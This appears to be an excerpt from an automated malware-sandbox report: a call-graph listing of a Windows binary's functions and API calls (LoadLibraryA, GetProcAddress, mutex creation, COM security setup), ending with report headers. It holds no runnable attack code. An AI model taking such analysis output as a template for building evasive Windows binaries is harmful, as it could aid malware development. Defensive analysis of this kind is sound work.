calls 69985->70278 69986 11139275 69994 1113928b EnableWindow 69986->69994 69998 11139284 SetForegroundWindow 69986->69998 69987->69934 69995 11146450 std::locale::_Init 21 API calls 69988->69995 69990->69984 70003 1110f420 std::locale::_Init 266 API calls 69990->70003 69991->69984 70290 1103f000 68 API calls 69991->70290 70012 111395ee 69993->70012 69994->69945 69995->70001 69996 111394d2 69996->69980 69997 111391b0 EnableWindow 69997->69976 69998->69994 69999 11139615 69999->69935 70014 1105dd10 79 API calls 69999->70014 70001->69953 70002 111393b2 70001->70002 70005 11081a70 IsDBCSLeadByte 70001->70005 70007 11143230 std::locale::_Init 8 API calls 70002->70007 70006 11139512 70003->70006 70004 111395aa 70291 1103f040 68 API calls 70004->70291 70005->70002 70009 11139544 70006->70009 70010 11139524 70006->70010 70011 111393c4 70007->70011 70286 1110f260 InterlockedIncrement 70009->70286 70285 110573b0 305 API calls std::locale::_Init 70010->70285 70011->69953 70017 111393cb GetLastError 70011->70017 70012->69999 70194 11142210 70012->70194 70013 111395b5 70292 1103f060 68 API calls 70013->70292 70015 11139645 70014->70015 70015->69935 70028 11139662 70015->70028 70029 1113968d 70015->70029 70021 11146450 std::locale::_Init 21 API calls 70017->70021 70020 11139533 70020->70009 70021->69953 70023 111395c0 70293 1103f020 68 API calls 70023->70293 70025 11139558 70287 1104e340 452 API calls 70025->70287 70026 111395cb 70294 1110f270 InterlockedDecrement 70026->70294 70030 1113966a 70028->70030 70031 11139699 GetTickCount 70028->70031 70029->69935 70029->70031 70034 11146450 std::locale::_Init 21 API calls 70030->70034 70031->69935 70035 111396ab 70031->70035 70033 1113956e 70288 1104e3b0 272 API calls 70033->70288 70037 11139675 GetTickCount 70034->70037 70038 11142e80 145 API calls 70035->70038 70037->69935 70039 111396b7 70038->70039 70040 11146ee0 270 API calls 70039->70040 70041 111396c2 70040->70041 70043 11142e80 145 API calls 70041->70043 70042 11139579 70042->69984 70289 110ebf30 286 API calls 70042->70289 70044 111396d5 70043->70044 70295 11025bb0 LoadLibraryA 70044->70295 70047 111396e2 70047->70047 70296 1112c7a0 GetProcAddress SetLastError 70047->70296 70049 11139729 70050 11139733 FreeLibrary 70049->70050 70051 1113973a std::ios_base::_Tidy 70049->70051 70050->70051 70051->69935 70053 11133962 70052->70053 70054 11133c84 70052->70054 70056 1105dd10 79 API calls 70053->70056 70055 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70054->70055 70057 11133c9c 70055->70057 70058 11133982 70056->70058 70097 11133400 70057->70097 70058->70054 70059 1113398a GetLocalTime 70058->70059 70060 111339c1 LoadLibraryA 70059->70060 70061 111339a0 70059->70061 70297 110098c0 LoadLibraryA 70060->70297 70062 11146450 std::locale::_Init 21 API calls 70061->70062 70064 111339b5 70062->70064 70064->70060 70065 11133a15 70298 11015c30 LoadLibraryA 70065->70298 70067 11133a20 GetCurrentProcess 70068 11133a45 GetProcAddress 70067->70068 70069 11133a5d 70067->70069 70068->70069 70070 11133a66 SetLastError 70068->70070 70071 11133a78 GetProcAddress 70069->70071 70073 11133a92 70069->70073 70070->70069 70072 11133ac7 SetLastError 70071->70072 70071->70073 70074 11133aa0 GetProcAddress 70072->70074 70073->70074 70075 11133aba 70073->70075 70074->70075 70076 11133ad4 SetLastError 70074->70076 70077 11133adf GetProcAddress 70075->70077 70076->70077 70078 11133aff SetLastError 70077->70078 70079 11133af1 70077->70079 70078->70079 70080 11146450 std::locale::_Init 21 API calls 70079->70080 70084 11133b7d 70079->70084 70080->70084 70081 11133c5a 70082 11133c6a FreeLibrary 70081->70082 70083 11133c6d 70081->70083 70082->70083 70085 11133c77 FreeLibrary 70083->70085 70086 11133c7a 70083->70086 70084->70081 70088 1105dd10 79 API calls 70084->70088 70085->70086 70086->70054 70087 11133c81 FreeLibrary 70086->70087 70087->70054 70089 11133bce 70088->70089 70090 1105dd10 79 API calls 70089->70090 70091 11133bf6 70090->70091 70092 1105dd10 79 API calls 70091->70092 70093 11133c1d 70092->70093 70094 1105dd10 79 API calls 70093->70094 70095 11133c44 70094->70095 70095->70081 70299 11027780 266 API calls 2 library calls 70095->70299 70099 1113342d 70097->70099 70098 111338e9 70098->69934 70098->69935 70199 11138c30 70098->70199 70099->70098 70100 110d1550 269 API calls 70099->70100 70101 1113348e 70100->70101 70102 110d1550 269 API calls 70101->70102 70103 11133499 70102->70103 70104 111334c7 70103->70104 70105 111334de 70103->70105 70300 11029450 266 API calls 2 library calls 70104->70300 70107 11146450 std::locale::_Init 21 API calls 70105->70107 70109 111334ec 70107->70109 70110 11133505 70109->70110 70111 1113351c 70109->70111 70301 11029450 266 API calls 2 library calls 70110->70301 70113 11081bb0 86 API calls 70111->70113 70115 1113352a 70113->70115 70116 11133541 70115->70116 70302 11009450 266 API calls std::locale::_Init 70115->70302 70118 11146450 std::locale::_Init 21 API calls 70116->70118 70122 111335e5 70116->70122 70120 11133556 70118->70120 70119 1113353b 70121 11081a70 IsDBCSLeadByte 70119->70121 70120->70122 70124 11146450 std::locale::_Init 21 API calls 70120->70124 70121->70116 70123 11146450 std::locale::_Init 21 API calls 70122->70123 70138 1113368e 70122->70138 70135 111335f7 70123->70135 70125 11133580 70124->70125 70303 110ed7a0 7 API calls 70125->70303 70127 11133598 70304 110ed430 272 API calls 3 library calls 70127->70304 70128 110ed1a0 8 API calls 70128->70135 70130 111335a9 70305 1102a0b0 266 API calls std::locale::_Init 70130->70305 70133 111335b3 70140 111335ca 70133->70140 70306 1101cdf0 266 API calls std::locale::_Init 70133->70306 70135->70128 70137 1113365b 70135->70137 70135->70138 70308 110ed430 272 API calls 3 library calls 70135->70308 70136 111335bf 70139 11146450 std::locale::_Init 21 API calls 70136->70139 70137->70135 70309 11029450 266 API calls 2 library calls 70137->70309 70142 111336c1 70138->70142 70143 111336aa 70138->70143 70139->70140 70140->70122 70307 1102a0b0 266 API calls std::locale::_Init 70140->70307 70146 11133734 70142->70146 70147 111336be 70142->70147 70148 111336ec 70142->70148 70310 11029450 266 API calls 2 library calls 70143->70310 70156 11133752 70146->70156 70157 11133769 70146->70157 70165 11133779 70146->70165 70184 111337cc 70146->70184 70147->70142 70311 11029450 266 API calls 2 library calls 70147->70311 70151 11081b40 std::locale::_Init IsDBCSLeadByte 70148->70151 70149 11162be5 _free 66 API calls 70152 1113378b 70149->70152 70158 111336f7 70151->70158 70167 111337b3 70152->70167 70168 1113379c 70152->70168 70153 11133816 70163 11133813 70153->70163 70171 11133845 70153->70171 70185 111338a1 70153->70185 70154 111337ff 70316 11029450 266 API calls 2 library calls 70154->70316 70314 11029450 266 API calls 2 library calls 70156->70314 70161 11081bb0 86 API calls 70157->70161 70158->70146 70177 11133725 70158->70177 70178 1113370e 70158->70178 70161->70165 70162 110d07c0 266 API calls 70166 111338da 70162->70166 70163->70153 70317 11029450 266 API calls 2 library calls 70163->70317 70165->70149 70165->70184 70172 110d07c0 266 API calls 70166->70172 70170 11163cf8 __strdup 66 API calls 70167->70170 70315 11029450 266 API calls 2 library calls 70168->70315 70174 111337bc 70170->70174 70176 11081bb0 86 API calls 70171->70176 70172->70098 70179 11146450 std::locale::_Init 21 API calls 70174->70179 70181 11133853 70176->70181 70313 110d0800 266 API calls 2 library calls 70177->70313 70312 11029450 266 API calls 2 library calls 70178->70312 70179->70184 70181->70185 70187 11133868 70181->70187 70188 1113387f 70181->70188 70184->70153 70184->70154 70185->70162 70318 11029450 266 API calls 2 library calls 70187->70318 70189 11081a70 IsDBCSLeadByte 70188->70189 70191 1113388a 70189->70191 70191->70185 70319 11009450 266 API calls std::locale::_Init 70191->70319 70195 1114222f 70194->70195 70196 1114221a 70194->70196 70195->69999 70320 11141890 70196->70320 70198->69928 70200 1113906f 70199->70200 70203 11138c4d 70199->70203 70201 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70200->70201 70202 1113907e 70201->70202 70202->69939 70203->70200 70204 111450a0 std::locale::_Init 90 API calls 70203->70204 70205 11138c8c 70204->70205 70205->70200 70206 1105dd10 79 API calls 70205->70206 70207 11138cbb 70206->70207 70456 1112c920 70207->70456 70209 11138e00 PostMessageA 70211 11138e15 70209->70211 70210 1105dd10 79 API calls 70212 11138dfc 70210->70212 70213 11138e25 70211->70213 70465 1110f270 InterlockedDecrement 70211->70465 70212->70209 70212->70211 70215 11138e2b 70213->70215 70216 11138e4d 70213->70216 70219 11138e83 std::ios_base::_Tidy 70215->70219 70220 11138e9e 70215->70220 70466 11130410 316 API calls std::locale::_Init 70216->70466 70218 11138e55 70467 1112cb20 SetDlgItemTextA 70218->70467 70226 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70219->70226 70221 11142e80 145 API calls 70220->70221 70223 11138ea3 70221->70223 70224 11146ee0 270 API calls 70223->70224 70227 11138eaa SetWindowTextA 70224->70227 70229 11138e9a 70226->70229 70230 11138ec6 70227->70230 70238 11138ecd std::ios_base::_Tidy 70227->70238 70228 11138e70 std::ios_base::_Tidy 70228->70215 70229->69939 70468 111352b0 300 API calls 5 library calls 70230->70468 70231 11145b40 272 API calls 70233 11138dab 70231->70233 70233->70209 70233->70210 70234 11138f24 70235 11138f38 70234->70235 70236 11138ffc 70234->70236 70241 11138f5c 70235->70241 70471 111352b0 300 API calls 5 library calls 70235->70471 70239 1113901d 70236->70239 70243 1113900b 70236->70243 70244 11139004 70236->70244 70237 11138ef7 70237->70234 70240 11138f0c 70237->70240 70238->70234 70238->70237 70469 111352b0 300 API calls 5 library calls 70238->70469 70477 110f8640 86 API calls 70239->70477 70470 11131210 147 API calls 70240->70470 70473 110f8640 86 API calls 70241->70473 70476 11131210 147 API calls 70243->70476 70475 111352b0 300 API calls 5 library calls 70244->70475 70248 11138f67 70248->70200 70254 11138f6f IsWindowVisible 70248->70254 70250 11138f1c 70250->70234 70252 11139028 70252->70200 70256 1113902c IsWindowVisible 70252->70256 70254->70200 70258 11138f86 70254->70258 70255 1113901a 70255->70239 70256->70200 70259 1113903e IsWindowVisible 70256->70259 70257 11138f46 70257->70241 70260 11138f52 70257->70260 70261 111450a0 std::locale::_Init 90 API calls 70258->70261 70259->70200 70262 1113904b EnableWindow 70259->70262 70472 11131210 147 API calls 70260->70472 70264 11138f91 70261->70264 70478 11131210 147 API calls 70262->70478 70264->70200 70267 11138f9c GetForegroundWindow IsWindowVisible 70264->70267 70266 11138f59 70266->70241 70269 11138fc1 70267->70269 70270 11138fb6 EnableWindow 70267->70270 70268 11139062 EnableWindow 70268->70200 70474 11131210 147 API calls 70269->70474 70270->70269 70272 11138fc8 70273 11138fde EnableWindow 70272->70273 70274 11138fd7 SetForegroundWindow 70272->70274 70275 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70273->70275 70274->70273 70276 11138ff8 70275->70276 70276->69939 70277->69985 70278->69997 70279->69969 70280->69986 70281->69952 70282->69978 70283->69996 70284->69980 70285->70020 70286->70025 70287->70033 70288->70042 70289->69984 70290->70004 70291->70013 70292->70023 70293->70026 70294->69984 70295->70047 70296->70049 70297->70065 70298->70067 70299->70081 70302->70119 70303->70127 70304->70130 70305->70133 70306->70136 70307->70122 70308->70135 70313->70146 70319->70185 70321 111418cf 70320->70321 70322 111418c8 std::ios_base::_Tidy 70320->70322 70323 1110f420 std::locale::_Init 266 API calls 70321->70323 70324 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70322->70324 70325 111418d6 70323->70325 70326 1114220a 70324->70326 70327 11141906 70325->70327 70445 11060f70 298 API calls std::locale::_Init 70325->70445 70326->70195 70329 11061700 94 API calls 70327->70329 70330 11141942 70329->70330 70331 11141949 RegCloseKey 70330->70331 70332 11141950 70330->70332 70331->70332 70333 11144dc0 268 API calls 70332->70333 70334 1114196c 70333->70334 70335 11143230 std::locale::_Init 8 API calls 70334->70335 70336 11141980 70335->70336 70337 11141997 70336->70337 70338 11062d60 325 API calls 70336->70338 70339 1110f420 std::locale::_Init 266 API calls 70337->70339 70338->70337 70340 1114199e 70339->70340 70341 111419ba 70340->70341 70446 11060be0 290 API calls std::locale::_Init 70340->70446 70343 1110f420 std::locale::_Init 266 API calls 70341->70343 70344 111419d3 70343->70344 70345 111419ef 70344->70345 70447 11060be0 290 API calls std::locale::_Init 70344->70447 70347 1110f420 std::locale::_Init 266 API calls 70345->70347 70348 11141a08 70347->70348 70349 11141a24 70348->70349 70448 11060be0 290 API calls std::locale::_Init 70348->70448 70351 11060760 269 API calls 70349->70351 70352 11141a4d 70351->70352 70353 11060760 269 API calls 70352->70353 70360 11141a67 70353->70360 70354 11141d95 70355 110d1550 269 API calls 70354->70355 70357 11142179 70354->70357 70358 11141db3 70355->70358 70356 110607f0 275 API calls 70356->70360 70365 11060640 69 API calls 70357->70365 70362 1105dd10 79 API calls 70358->70362 70359 11141d85 70361 11146450 std::locale::_Init 21 API calls 70359->70361 70360->70354 70360->70356 70360->70359 70363 11146450 21 API calls std::locale::_Init 70360->70363 70371 111319f0 86 API calls 70360->70371 70387 11081c60 86 API calls std::locale::_Init 70360->70387 70390 11081bb0 86 API calls 70360->70390 70361->70354 70364 11141df0 70362->70364 70363->70360 70366 11141f3d 70364->70366 70369 11060760 269 API calls 70364->70369 70367 111421d2 70365->70367 70368 11060f40 275 API calls 70366->70368 70370 11060640 69 API calls 70367->70370 70373 11141f59 70368->70373 70372 11141e0e 70369->70372 70370->70322 70371->70360 70374 110607f0 275 API calls 70372->70374 70449 110679c0 299 API calls std::locale::_Init 70373->70449 70380 11141e1d 70374->70380 70376 11141e52 70377 11060760 269 API calls 70376->70377 70381 11141e68 70377->70381 70378 11141f83 70382 11141fb3 EnterCriticalSection 70378->70382 70392 11141f87 70378->70392 70379 11146450 std::locale::_Init 21 API calls 70379->70380 70380->70376 70380->70379 70384 110607f0 275 API calls 70380->70384 70385 110607f0 275 API calls 70381->70385 70383 11060420 272 API calls 70382->70383 70386 11141fd0 70383->70386 70384->70380 70402 11141e78 70385->70402 70389 11060f40 275 API calls 70386->70389 70387->70360 70393 11141fe6 70389->70393 70390->70360 70391 11141eb1 70394 11060760 269 API calls 70391->70394 70392->70382 70450 110508e0 344 API calls 4 library calls 70392->70450 70451 110679c0 299 API calls std::locale::_Init 70392->70451 70396 11141ffa LeaveCriticalSection 70393->70396 70399 1102a9f0 284 API calls 70393->70399 70395 11141ec7 70394->70395 70398 110607f0 275 API calls 70395->70398 70400 1114204e 70396->70400 70401 1114200e 70396->70401 70397 11146450 std::locale::_Init 21 API calls 70397->70402 70417 11141ed6 70398->70417 70404 11141ff7 70399->70404 70405 11133400 274 API calls 70400->70405 70401->70400 70409 11146450 std::locale::_Init 21 API calls 70401->70409 70402->70391 70402->70397 70406 110607f0 275 API calls 70402->70406 70404->70396 70408 11142058 70405->70408 70406->70402 70407 11141f11 70411 11060640 69 API calls 70407->70411 70410 110d1550 269 API calls 70408->70410 70412 1114201c 70409->70412 70414 11142066 70410->70414 70415 11141f1f 70411->70415 70416 1113cc30 302 API calls 70412->70416 70413 11146450 std::locale::_Init 21 API calls 70413->70417 70452 110cff20 266 API calls std::locale::_Init 70414->70452 70418 11060640 69 API calls 70415->70418 70419 11142021 70416->70419 70417->70407 70417->70413 70420 110607f0 275 API calls 70417->70420 70421 11141f2e 70418->70421 70422 111414a0 1074 API calls 70419->70422 70420->70417 70424 11060640 69 API calls 70421->70424 70425 11142027 70422->70425 70424->70366 70425->70400 70426 11146450 std::locale::_Init 21 API calls 70425->70426 70427 11142040 70426->70427 70430 11026ba0 404 API calls 70427->70430 70428 110d07c0 266 API calls 70431 1114215b 70428->70431 70429 1114209c 70432 111420c3 70429->70432 70433 111420da 70429->70433 70439 1114211f 70429->70439 70430->70400 70434 110d07c0 266 API calls 70431->70434 70453 11029450 266 API calls 2 library calls 70432->70453 70436 11081bb0 86 API calls 70433->70436 70434->70357 70438 111420eb 70436->70438 70438->70439 70454 11009450 266 API calls std::locale::_Init 70438->70454 70439->70428 70441 111420ff 70442 11081a70 IsDBCSLeadByte 70441->70442 70443 11142105 70442->70443 70443->70439 70455 11009450 266 API calls std::locale::_Init 70443->70455 70445->70327 70446->70341 70447->70345 70448->70349 70449->70378 70450->70392 70451->70392 70452->70429 70454->70441 70455->70439 70457 1112c93c 70456->70457 70458 1112c977 70457->70458 70459 1112c964 70457->70459 70479 1106b860 299 API calls 70458->70479 70462 11146ee0 270 API calls 70459->70462 70461 1112c96f 70463 1112c9c3 70461->70463 70464 11142290 std::locale::_Init 266 API calls 70461->70464 70462->70461 70463->70231 70463->70233 70464->70463 70465->70213 70466->70218 70467->70228 70468->70238 70469->70237 70470->70250 70471->70257 70472->70266 70473->70248 70474->70272 70475->70243 70476->70255 70477->70252 70478->70268 70479->70461 70480 11144200 70481 11144211 70480->70481 70494 11143c20 70481->70494 70485 11144295 70487 111442b2 70485->70487 70489 11144294 70485->70489 70486 1114425b 70488 11144262 ResetEvent 70486->70488 70502 11143de0 266 API calls 2 library calls 70488->70502 70489->70485 70503 11143de0 266 API calls 2 library calls 70489->70503 70492 11144276 SetEvent WaitForMultipleObjects 70492->70488 70492->70489 70493 111442af 70493->70487 70495 11143c2c GetCurrentProcess 70494->70495 70496 11143c4f 70494->70496 70495->70496 70497 11143c3d GetModuleFileNameA 70495->70497 70498 1110f420 std::locale::_Init 264 API calls 70496->70498 70500 11143c79 WaitForMultipleObjects 70496->70500 70497->70496 70499 11143c6b 70498->70499 70499->70500 70504 11143570 GetModuleFileNameA 70499->70504 70500->70485 70500->70486 70502->70492 70503->70493 70505 111435f3 70504->70505 70506 111435b3 70504->70506 70509 111435ff LoadLibraryA 70505->70509 70510 11143619 GetModuleHandleA GetProcAddress 70505->70510 70507 11081b40 std::locale::_Init IsDBCSLeadByte 70506->70507 70508 111435c1 70507->70508 70508->70505 70511 111435c8 LoadLibraryA 70508->70511 70509->70510 70512 1114360e LoadLibraryA 70509->70512 70513 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 70510->70513 70514 11143639 70510->70514 70511->70505 70512->70510 70515 11143673 10 API calls 70513->70515 70514->70515 70516 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70515->70516 70517 111436f0 70516->70517 70517->70500 70518 1115bde0 70519 1115bdf4 70518->70519 70520 1115bdec 70518->70520 70530 111631ab 70519->70530 70523 1115be14 70524 1115bf40 70526 11162be5 _free 66 API calls 70524->70526 70527 1115bf68 70526->70527 70528 1115be31 70528->70524 70529 1115bf24 SetLastError 70528->70529 70529->70528 70531 11170166 __calloc_crt 66 API calls 70530->70531 70532 111631c5 70531->70532 70533 1115be08 70532->70533 70554 111692ef 66 API calls __getptd_noexit 70532->70554 70533->70523 70533->70524 70537 1115ba20 CoInitializeSecurity CoCreateInstance 70533->70537 70535 111631d8 70535->70533 70555 111692ef 66 API calls __getptd_noexit 70535->70555 70538 1115ba95 wsprintfW SysAllocString 70537->70538 70539 1115bc14 70537->70539 70544 1115badb 70538->70544 70540 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70539->70540 70542 1115bc40 70540->70542 70541 1115bc01 SysFreeString 70541->70539 70542->70528 70543 1115bbe9 70543->70541 70544->70541 70544->70543 70544->70544 70545 1115bb6c 70544->70545 70546 1115bb5a wsprintfW 70544->70546 70556 110974a0 70545->70556 70546->70545 70548 1115bb7e 70549 110974a0 267 API calls 70548->70549 70550 1115bb93 70549->70550 70561 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 70550->70561 70552 1115bbd7 70562 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 70552->70562 70554->70535 70555->70533 70557 1110f420 std::locale::_Init 266 API calls 70556->70557 70558 110974d3 70557->70558 70559 110974e6 SysAllocString 70558->70559 70560 11097504 70558->70560 70559->70560 70560->70548 70561->70552 70562->70543 70563 1116970d 70564 1116971d 70563->70564 70565 11169718 70563->70565 70569 11169617 70564->70569 70581 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 70565->70581 70568 1116972b 70571 11169623 _raise 70569->70571 70570 11169670 70578 111696c0 _raise 70570->70578 70629 11025e20 70570->70629 70571->70570 70571->70578 70582 111694b3 70571->70582 70574 11169683 70575 111696a0 70574->70575 70577 11025e20 ___DllMainCRTStartup 7 API calls 70574->70577 70576 111694b3 __CRT_INIT@12 136 API calls 70575->70576 70575->70578 70576->70578 70579 11169697 70577->70579 70578->70568 70580 111694b3 __CRT_INIT@12 136 API calls 70579->70580 70580->70575 70581->70564 70583 111694bf _raise 70582->70583 70584 111694c7 70583->70584 70585 11169541 70583->70585 70638 1116d4d0 HeapCreate 70584->70638 70586 11169547 70585->70586 70587 111695a2 70585->70587 70596 11169565 70586->70596 70600 111694d0 _raise 70586->70600 70700 1116d79b 66 API calls _doexit 70586->70700 70589 111695a7 70587->70589 70590 11169600 70587->70590 70592 1116b5fa ___set_flsgetvalue 3 API calls 70589->70592 70590->70600 70706 1116b8fe 79 API calls __freefls@4 70590->70706 70591 111694cc 70591->70600 70639 1116b96c GetModuleHandleW 70591->70639 70594 111695ac 70592->70594 70601 11169dbe __calloc_crt 66 API calls 70594->70601 70597 11169579 70596->70597 70701 1117140e 67 API calls _free 70596->70701 70704 1116958c 70 API calls __mtterm 70597->70704 70600->70570 70605 111695b8 70601->70605 70603 111694dc __RTC_Initialize 70604 111694e0 70603->70604 70611 111694ec GetCommandLineA ___crtGetEnvironmentStringsA 70603->70611 70697 1116d4ee HeapDestroy 70604->70697 70605->70600 70608 111695c4 DecodePointer FlsSetValue 70605->70608 70606 1116956f 70702 1116b64b 70 API calls _free 70606->70702 70612 111695f4 70608->70612 70613 111695dd 70608->70613 70610 11169574 70703 1116d4ee HeapDestroy 70610->70703 70664 111711c9 GetStartupInfoW 70611->70664 70614 11162be5 _free 66 API calls 70612->70614 70705 1116b688 66 API calls 4 library calls 70613->70705 70614->70600 70619 111695e4 GetCurrentThreadId 70619->70600 70620 11169511 __setargv 70623 1116952a 70620->70623 70624 1116951a 70620->70624 70621 1116950a 70698 1116b64b 70 API calls _free 70621->70698 70623->70600 70699 1117140e 67 API calls _free 70623->70699 70677 11176c61 70624->70677 70630 1110f7d0 70629->70630 70631 1110f7f1 70630->70631 70633 1110f804 ___DllMainCRTStartup 70630->70633 70634 1110f7dc 70630->70634 70714 1110f720 70631->70714 70633->70574 70634->70633 70635 1110f720 ___DllMainCRTStartup 7 API calls 70634->70635 70637 1110f7e5 70635->70637 70636 1110f7f8 70636->70574 70637->70574 70638->70591 70640 1116b980 70639->70640 70641 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 70639->70641 70707 1116b64b 70 API calls _free 70640->70707 70643 1116b9d3 TlsAlloc 70641->70643 70646 1116bae2 70643->70646 70647 1116ba21 TlsSetValue 70643->70647 70644 1116b985 70644->70603 70646->70603 70647->70646 70648 1116ba32 70647->70648 70708 1116d557 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 70648->70708 70650 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 70709 111735c2 InitializeCriticalSectionAndSpinCount 70650->70709 70652 1116ba76 70653 1116badd 70652->70653 70654 1116ba7a DecodePointer 70652->70654 70711 1116b64b 70 API calls _free 70653->70711 70656 1116ba8f 70654->70656 70656->70653 70657 11169dbe __calloc_crt 66 API calls 70656->70657 70658 1116baa5 70657->70658 70658->70653 70659 1116baad DecodePointer 70658->70659 70660 1116babe 70659->70660 70660->70653 70661 1116bac2 70660->70661 70710 1116b688 66 API calls 4 library calls 70661->70710 70663 1116baca GetCurrentThreadId 70663->70646 70665 11169dbe __calloc_crt 66 API calls 70664->70665 70674 111711e7 70665->70674 70666 11171392 GetStdHandle 70671 1117135c 70666->70671 70667 11169dbe __calloc_crt 66 API calls 70667->70674 70668 111713f6 SetHandleCount 70676 11169506 70668->70676 70669 111713a4 GetFileType 70669->70671 70670 111712dc 70670->70671 70672 11171313 InitializeCriticalSectionAndSpinCount 70670->70672 70673 11171308 GetFileType 70670->70673 70671->70666 70671->70668 70671->70669 70675 111713ca InitializeCriticalSectionAndSpinCount 70671->70675 70672->70670 70672->70676 70673->70670 70673->70672 70674->70667 70674->70670 70674->70671 70674->70676 70675->70671 70675->70676 70676->70620 70676->70621 70678 11176c6a 70677->70678 70681 11176c6f _strlen 70677->70681 70712 11170be7 94 API calls __setmbcp 70678->70712 70679 1116951f 70679->70623 70693 1116d5ae 70679->70693 70681->70679 70682 11169dbe __calloc_crt 66 API calls 70681->70682 70684 11176ca4 _strlen 70682->70684 70683 11176cf3 70685 11162be5 _free 66 API calls 70683->70685 70684->70679 70684->70683 70686 11169dbe __calloc_crt 66 API calls 70684->70686 70687 11176d19 70684->70687 70688 1116be9f _strcpy_s 66 API calls 70684->70688 70690 11176d30 70684->70690 70685->70679 70686->70684 70689 11162be5 _free 66 API calls 70687->70689 70688->70684 70689->70679 70691 1116deb2 __invoke_watson 10 API calls 70690->70691 70692 11176d3c 70691->70692 70694 1116d5bc __IsNonwritableInCurrentImage 70693->70694 70713 1116c9cb EncodePointer 70694->70713 70696 1116d5da __initterm_e __cinit __IsNonwritableInCurrentImage 70696->70623 70697->70600 70698->70604 70699->70621 70700->70596 70701->70606 70702->70610 70703->70597 70704->70600 70705->70619 70706->70600 70707->70644 70708->70650 70709->70652 70710->70663 70711->70646 70712->70681 70713->70696 70715 1110f764 EnterCriticalSection 70714->70715 70716 1110f74f InitializeCriticalSection 70714->70716 70719 1110f785 70715->70719 70716->70715 70717 1110f7b3 LeaveCriticalSection 70717->70636 70718 1110f6c0 ___DllMainCRTStartup 4 API calls 70718->70719 70719->70717 70719->70718 70720 110304b8 70721 11142a60 268 API calls 70720->70721 70722 110304c6 70721->70722 70723 11142bb0 86 API calls 70722->70723 70724 11030503 70723->70724 70725 11081bb0 86 API calls 70724->70725 70727 11030518 70724->70727 70725->70727 70726 110ed1a0 8 API calls 70728 1103053f 70726->70728 70727->70726 70729 11030589 70728->70729 70791 110ed250 81 API calls 2 library calls 70728->70791 70732 11142bb0 86 API calls 70729->70732 70731 11030554 70792 110ed250 81 API calls 2 library calls 70731->70792 70734 110305a0 70732->70734 70736 1110f420 std::locale::_Init 266 API calls 70734->70736 70735 1103056b 70735->70729 70737 111463d0 19 API calls 70735->70737 70738 110305af 70736->70738 70737->70729 70739 110305d0 70738->70739 70793 11088860 269 API calls 70738->70793 70771 1108a470 70739->70771 70742 110305e3 OpenMutexA 70743 11030603 CreateMutexA 70742->70743 70744 1103071a CloseHandle 70742->70744 70745 11030623 70743->70745 70746 1108a570 69 API calls 70744->70746 70747 1110f420 std::locale::_Init 266 API calls 70745->70747 70749 11030730 70746->70749 70748 11030638 70747->70748 70750 1103065b 70748->70750 70794 11060be0 290 API calls std::locale::_Init 70748->70794 70752 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 70749->70752 70795 11015c30 LoadLibraryA 70750->70795 70753 110310b3 70752->70753 70755 1103066d 70756 111450a0 std::locale::_Init 90 API calls 70755->70756 70757 1103067c 70756->70757 70758 11030689 70757->70758 70759 1103069c 70757->70759 70782 11145ae0 70758->70782 70761 110306a6 GetProcAddress 70759->70761 70762 11030690 70759->70762 70761->70762 70763 110306c0 SetLastError 70761->70763 70764 110281a0 47 API calls 70762->70764 70763->70762 70765 110306cd 70764->70765 70796 110092f0 428 API calls std::locale::_Init 70765->70796 70767 110306dc 70768 110306f0 WaitForSingleObject 70767->70768 70768->70768 70769 11030702 CloseHandle 70768->70769 70769->70744 70770 11030713 FreeLibrary 70769->70770 70770->70744 70772 1110f420 std::locale::_Init 266 API calls 70771->70772 70773 1108a4a7 70772->70773 70775 1110f420 std::locale::_Init 266 API calls 70773->70775 70778 1108a4c9 InitializeCriticalSection 70773->70778 70777 1108a4c2 70775->70777 70776 1108a52a 70776->70742 70777->70778 70797 1116219a 66 API calls std::exception::_Copy_str 70777->70797 70778->70776 70780 1108a4f9 70798 111625f1 RaiseException 70780->70798 70783 111450a0 std::locale::_Init 90 API calls 70782->70783 70784 11145af2 70783->70784 70785 11145b30 70784->70785 70786 11145af9 LoadLibraryA 70784->70786 70785->70762 70787 11145b2a 70786->70787 70788 11145b0b GetProcAddress 70786->70788 70787->70762 70789 11145b23 FreeLibrary 70788->70789 70790 11145b1b 70788->70790 70789->70787 70790->70789 70791->70731 70792->70735 70793->70739 70794->70750 70795->70755 70796->70767 70797->70780 70798->70778

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
